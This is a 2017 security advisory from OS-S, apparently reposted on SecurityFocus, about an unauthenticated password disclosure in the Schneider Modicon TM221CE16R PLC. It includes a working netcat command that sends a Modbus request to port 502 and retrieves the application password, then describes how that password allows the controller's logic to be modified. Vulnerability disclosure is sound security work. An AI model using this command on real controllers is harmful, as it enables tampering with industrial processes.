Back to list
OS-S-2017-01: The password for the application protection of the Schneider Modicon TM221CE16R can be retrieved without authentication. Subsequently the application may be arbitrarily downloaded, uploaded and modified. CVSS 10.
Apr 04 2017 11:51AM
Ralf Spenneberg (info os-t de)
OpenSource Security Ralf Spenneberg
Am Bahnhof 3-5
info (at) os-s (dot) net [email concealed]
OS-S Security Advisory 2017-01
Date: April 4th, 2017
Authors: Simon Heming, Maik BrÃ¼ggemann, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
Affected Device: Schneider Modicon TM221CE16R, Firmware 18.104.22.168
Title: The password for the application protection of the Schneider
Modicon TM221CE16R can be retrieved without authentication. Subsequently
the application may be arbitrarily downloaded, uploaded and modified.
Severity: Critical. The protection of the application is not existant.
Ease of Exploitation: Trivial
Vulnerability type: Information Disclosure
Vendor contacted: December 23rd, 2016
The Application Protection is used to prevent the transfer of the
application from a logic controller into a SoMachine Basic project. A
simple command (seen below) can be send via Modbus over TCP port 502 to
the logic controller and it will return the password unencrypted.
// bash command
echo -n -e '\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00' | nc IP 502
After that the retrieved password can be entered in SoMachine Basic to
download, modify and subsequently upload again any desired application.
We contacted the vendor. Apart from the first acknowledgement of the
receipt of the report we did not receive any further information.
OpenSource Training Ralf Spenneberg http://www.os-t.de
Am Bahnhof 3-5 48565 Steinfurt Germany
Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757
[ reply ]
Copyright 2010, SecurityFocus